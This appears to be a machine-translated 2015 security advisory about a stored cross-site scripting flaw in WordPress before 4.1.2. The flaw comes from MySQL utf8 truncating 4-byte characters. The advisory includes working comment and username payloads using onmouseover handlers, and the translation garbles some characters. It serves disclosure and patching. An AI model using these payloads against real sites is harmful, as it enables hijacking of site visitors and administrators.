WordPress < 4.1.2 version there is XSS vulnerability, an attacker can exploit to obtain site permissions-bug warning-the black bar safety net

2015-04-27T00:00:00
ID MYHACK58:62201561743
Type myhack58
Reporter 佚名
Modified 2015-04-27T00:00:00

Description

tldr; mysql → special characters → truncation → input validation → output sanitisation → xss → time to update WordPress. Mysql truncate Mysql utf8 character set only support up to 3-byte characters, if you insert a 4-byte characters, the default configuration of mysql will truncate the character. Mysql strict mode can solve this problem, the default is turned on. · Example (before insert): ex�tic· Example (after insert): ex

WordPress WordPress comments support html tags, · A nice user could comment: <abbr title=’Web log’>blog!& lt;/abbr>· A not so nice user could comment: <abbr title=’Web�log’>blog!& lt;/abbr>

Two reviews are available through the wordpress input validation, and the 2 species will be saved as the <abbr title=’Web

The input is truncated. If the user insert the username: cedric’ onmouseover=’alert(1)’ style=’position:fixed;top:0;left:0;width:1 0 0%;height:1 0 0%’

The final output is <div class="comment" id="comment-1"><div class="comment-author">Testing </div> <div class=”comment-content”> <p> the <abbr title=’Web </p> </div> <div class="comment" id="comment-2"> <div class=”comment-author”> cedric’ onmouseover=’alert(1)’ style=’position:fixed;top:0;left:0;width:1 0 0%;height:1 0 0%’ </div> <div class=”comment-content”> <p> Injected </p> <div> </div>

Sort out the <abbr title=’Web...... cedric’ onmouseover=’alert(1)’ style=’position:fixed;top:0;left:0;width:1 0 0%;height:1 0 0%’>

Thus, it is cross-site. The output of the filter Above the use of relatively complex, there is also another way. When the comments contain a newline, quote will be encoded as If we input sometext<blockquote cite=’x onmouseover=alert(1) style=position:fixed;width:1 0 0%;height:1 0 0%;top:0; �’>

Will eventually get, <blockquote cite=“x onmouseover=alert(1) style=position:fixed;width:1 0 0%;height:1 0 0%;top:0; ...>

Use Unfamiliar user of the first comments need to be reviewed, if the user made a normal comment, waiting for comments to pass through. This latter comment can be directly, do not need to review you canxss.

Solutions

As soon as possible to upgrade to 4. 2 Version current latest it. If you cannot upgrade, please set the mysql character set to latin1. Or carefully review comment.